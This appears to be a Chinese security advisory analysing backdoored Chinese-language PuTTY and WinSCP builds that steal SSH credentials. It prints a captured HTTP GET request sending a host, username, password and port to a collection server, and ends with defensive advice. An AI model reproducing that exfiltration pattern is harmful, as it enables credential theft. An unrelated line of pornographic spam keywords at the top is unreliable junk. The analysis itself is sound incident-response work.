偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

中文版putty后門(mén)事件分析

安全
近幾日,中文版putty等SSH遠(yuǎn)程管理工具被曝出存在后門(mén),該后門(mén)會(huì)自動(dòng)竊取管理員所輸入的SSH用戶名與口令,并將其發(fā)送至指定服務(wù)器上。

近幾日,中文版putty等SSH遠(yuǎn)程管理工具被曝出存在后門(mén),該后門(mén)會(huì)自動(dòng)竊取管理員所輸入的SSH用戶名與口令,并將其發(fā)送至指定服務(wù)器上。知道創(chuàng)宇安全研究小組在第一時(shí)間獲取該消息后,對(duì)此次事件進(jìn)行了跟蹤和分析。根據(jù)分析,此次事件涉及到來(lái)自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站點(diǎn)的中文版putty、WinSCP、SSHSecure和sftp等軟件,而這些軟件的英文版本不受影響。

1.時(shí)間線

1月25日:新浪微博有網(wǎng)友發(fā)布消息稱(chēng)putty和winscp中裝有后門(mén)程序,但該條微博并未提及后門(mén)程序的類(lèi)型及其技術(shù)細(xì)節(jié),而且消息也未被過(guò)多的人所重視,目前無(wú)法確定該條微博是否與此次事件有關(guān)聯(lián):

1月30日下午16點(diǎn)左右:互聯(lián)網(wǎng)上再度出現(xiàn)關(guān)于中文版putty等SSH管理軟件被裝有后門(mén)的消息,并且此消息對(duì)后門(mén)的行為特征進(jìn)行了簡(jiǎn)要的描述——該程序會(huì)導(dǎo)致root密碼丟失,但發(fā)布者仍未披露具體的技術(shù)細(xì)節(jié):

以上微博的短URL所對(duì)應(yīng)的文章截圖如下:

 

1月31日:經(jīng)過(guò)一晚的醞釀,putty事件開(kāi)始在互聯(lián)網(wǎng)上廣泛傳播,微博、論壇等信息發(fā)布平臺(tái)上開(kāi)始大量出現(xiàn)putty后門(mén)事件的消息,同時(shí),很多技術(shù)人員也開(kāi)始對(duì)含有后門(mén)的putty等SSH管理軟件進(jìn)行技術(shù)分析,并陸續(xù)發(fā)布其中的技術(shù)細(xì)節(jié)。

2.事件分析

2.1問(wèn)題軟件源頭

知道創(chuàng)宇安全研究團(tuán)隊(duì)在獲取信息后,第一時(shí)間對(duì)putty等軟件進(jìn)行了跟蹤分析。通過(guò)分析發(fā)現(xiàn),來(lái)自以下幾個(gè)站點(diǎn)的中文版putty、WinSCP、SSHSecure和sftp等軟件都可能存在后門(mén)程序:

 

http://www.winscp.cc

http://www.sshsecure.com

2.2行為分析

2.2.1網(wǎng)絡(luò)行為分析

使用帶有后門(mén)程序的中文版putty等SSH管理軟件連接服務(wù)器時(shí),程序會(huì)自動(dòng)記錄登錄時(shí)的用戶名、密碼和服務(wù)器IP地址等信息,并會(huì)以HTTP的方式將這些信息發(fā)送到指定的服務(wù)器上,以下是在分析過(guò)程中抓取到的原始HTTP數(shù)據(jù):

GET/yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTYHTTP/1.1

User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64;rv:6.0a2)Gecko/20110613Firefox/6.0a2

Host:l.ip-163.com:88

Pragma:no-cache

從以上數(shù)據(jù)可以獲得以下信息:

1.敏感信息通過(guò)HTTPGET的方式發(fā)送到服務(wù)器l.ip-163.com上(經(jīng)測(cè)試,該域名與putty.org.cn位于同一IP地址上)

2.用于收集密碼的程序地址為

3.敏感信息以GET參數(shù)的方式發(fā)送到服務(wù)器上,相關(guān)參數(shù)為:

act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY

每個(gè)字段的作用如下:

act為執(zhí)行的動(dòng)作,參數(shù)add用于添加信息,經(jīng)測(cè)試,也可使用del來(lái)刪除信息

user為SSH服務(wù)器的IP地址,此處為50.23.79.188

pwd為連接服務(wù)器時(shí)的登錄用戶名,此處為abc

ll1為登錄密碼,此處為pass

ll2為目標(biāo)服務(wù)器的SSH端口,此處為22(即,默認(rèn)端口)

ll3則為客戶端類(lèi)型,此處為PuTTY

2.2.2服務(wù)器本地文件分析

知道創(chuàng)宇安全研究團(tuán)隊(duì)借助文件完整性校驗(yàn)的方式,對(duì)服務(wù)器初始安全狀態(tài)下的/etc、/lib、/usr、/bin等敏感目錄進(jìn)行了完整性備份,并在putty連接測(cè)試后對(duì)這些目錄的文件變更、丟失和添加等情況進(jìn)行了校驗(yàn),校驗(yàn)結(jié)果顯示,中文版putty并未對(duì)服務(wù)器自動(dòng)安裝后門(mén)程序。

網(wǎng)絡(luò)上部分消息稱(chēng),有些使用中文版putty進(jìn)行過(guò)遠(yuǎn)程管理的服務(wù)器上出現(xiàn)惡意代碼和文件,可能是由于惡意用戶獲取了putty所收集的密碼后人為植入所致。

2.3事件后續(xù)

截止至2月1日,在本次事件中所涉及的以下域名均已不能訪問(wèn):

http://www.putty.org.cn

http://putty.ws

http://www.winscp.cc

http://www.sshsecure.com

http://l.ip-163.com:88

但是,在1月31日晚,網(wǎng)絡(luò)上傳出“l(fā).ip-163.com被黑”的消息并配有一張“受害者列表”的截圖:

而就在此消息發(fā)布不久之后,互聯(lián)網(wǎng)上便出現(xiàn)了完整的受害者列表供所有用戶瀏覽和下載,根據(jù)這份來(lái)自互聯(lián)網(wǎng)列表的顯示,不但有眾多政府網(wǎng)站位列其中,IBM、Oracle、HP等大廠商的服務(wù)器也出現(xiàn)在列表內(nèi)。

3.安全建議

若您使用過(guò)中文版的putty、WinSCP、SSHSecure和sftp等軟件,但暫時(shí)又不能對(duì)服務(wù)器進(jìn)行下線處理,可采取以下臨時(shí)解決方案來(lái)處理:

1.使用chkrootkit或rootkithunter對(duì)服務(wù)器進(jìn)行掃描,檢查是否存在已知后門(mén)

2.查看網(wǎng)絡(luò)是否有可疑外聯(lián),并加強(qiáng)對(duì)可疑外聯(lián)的監(jiān)控

3.在網(wǎng)絡(luò)層建立端口訪問(wèn)控制策略,阻止除正常業(yè)務(wù)外的一切非業(yè)務(wù)、非管理端口

4.更換SSH登錄密碼,建議登錄時(shí)使用證書(shū)加密碼的組合方式進(jìn)行身份驗(yàn)證

5.登錄SSH時(shí),不要直接使用root用戶,先使用普通用戶登錄后,再su至root

6.服務(wù)器端通過(guò)TCPWrapper或iptables等軟件,限制IP訪問(wèn),僅允許特定IP地址對(duì)服務(wù)器的SSH進(jìn)行連接和管理

7.如需使用putty、WinSCP等軟件,可訪問(wèn)其官方站點(diǎn)下載:

http://www.putty.org/

http://winscp.net/eng/docs/lang:chs
 

責(zé)任編輯:于爽 來(lái)源: www.knownsec.com
相關(guān)推薦

2012-02-01 15:24:38

2024-02-21 15:05:30

2010-05-28 18:07:47

TortoiseSVN

2009-08-18 16:19:57

Google Insi

2010-08-26 17:08:20

vsftpd faq

2010-05-24 17:26:59

TortoiseSVN

2011-03-03 13:25:57

2009-06-11 10:15:09

netbeans 安裝

2012-09-10 10:42:34

IBMdw

2010-01-19 14:46:04

jQuery 1.4

2012-03-14 09:27:56

Tango

2014-11-19 17:18:21

Perforce

2009-09-27 18:04:00

思科認(rèn)證中文

2019-09-02 14:58:03

深度學(xué)習(xí)編程人工智能

2010-03-31 11:04:38

云安全

2011-03-25 12:57:16

LinuxCacti安裝

2010-06-09 16:33:46

Cacti中文

2012-02-01 09:34:50

2015-08-14 11:37:37

Swift語(yǔ)言中文版

2011-03-29 14:17:27

Cacti中文版Centos
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)